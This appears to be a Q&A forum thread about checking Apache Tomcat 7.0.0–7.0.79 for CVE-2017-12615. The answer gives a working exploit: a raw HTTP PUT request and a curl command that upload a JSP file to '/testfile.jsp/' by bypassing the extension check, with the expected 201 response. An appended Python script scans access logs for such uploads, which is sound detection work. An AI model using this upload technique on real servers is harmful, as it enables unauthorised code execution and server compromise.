0 votes

How can I check the vulnerability for Apache Tomcat 7.0.0 to 7.0.79 (CVE-2017-12615)?

by (111 points)

1 Answer

0 votes

You can bypass the file extension check by inserting a '/' character after the filename's extension.

HTTP Request:

PUT /file.jsp/ HTTP/1.1
Host: localhost:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

Expected response if successful:

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

Create a .jsp file (e.g. testfile.jsp):

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

cURL command on target server:

curl -X PUT http://localhost:port/testfile.jsp/ -d @- < testfile.jsp

Check the file by browsing to the target address or:

curl http://localhost:port/testfile.jsp

by (147 points)
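To check from the server side whether the request shape in the answer above has already been sent to a Tomcat instance, the access log can be searched for PUT requests whose path ends in a JSP extension followed by '/'. The following is an added example, not part of the original answer: it assumes the access log uses the "common" log pattern, the sample lines are constructed, and the function name `find_jsp_put_uploads` is hypothetical.

```python
import re
from collections import namedtuple

# Constructed sample lines in the "common" access-log pattern (assumption).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Sep/2017:06:36:36 +0000] "PUT /testfile.jsp/ HTTP/1.1" 201 -
10.0.0.5 - - [23/Sep/2017:06:36:41 +0000] "GET /testfile.jsp HTTP/1.1" 200 63
10.0.0.9 - - [23/Sep/2017:07:02:10 +0000] "PUT /notes.jsp/ HTTP/1.1" 403 -
10.0.0.7 - - [23/Sep/2017:07:15:00 +0000] "GET /index.jsp HTTP/1.1" 200 1024
10.0.0.8 - - [23/Sep/2017:07:20:00 +0000] "PUT /docs/readme.txt HTTP/1.1" 201 -
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# JSP extension followed by '/' at the end of the path, as in the request above.
SLASH_JSP_RE = re.compile(r'\.jspx?/$', re.IGNORECASE)

Finding = namedtuple("Finding", "ip ts path stored_as written fetched")


def find_jsp_put_uploads(log_text):
    """Flag PUTs to '<name>.jsp/' and note whether the stored file was later served."""
    entries = [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]
    findings = []
    for i, e in enumerate(entries):
        path = e["path"].split("?", 1)[0]
        if e["method"] != "PUT" or not SLASH_JSP_RE.search(path):
            continue
        stored_as = path.rstrip("/")  # name the file would have on disk
        # 201 = file created, 204 = existing file overwritten
        written = e["status"] in ("201", "204")
        # A later 200 for the slash-less path means the uploaded JSP was served.
        fetched = written and any(
            later["path"].split("?", 1)[0] == stored_as and later["status"] == "200"
            for later in entries[i + 1:]
        )
        findings.append(Finding(e["ip"], e["ts"], path, stored_as, written, fetched))
    return findings


if __name__ == "__main__":
    for f in find_jsp_put_uploads(SAMPLE_LOG):
        state = "written+served" if f.fetched else "written" if f.written else "rejected"
        print(f"{f.ts} {f.ip} PUT {f.path} -> {f.stored_as}: {state}")
```

A finding with `written` set means the server accepted the upload and should be treated as compromised until the stored file is located and reviewed; a rejected attempt still shows that the host is being probed.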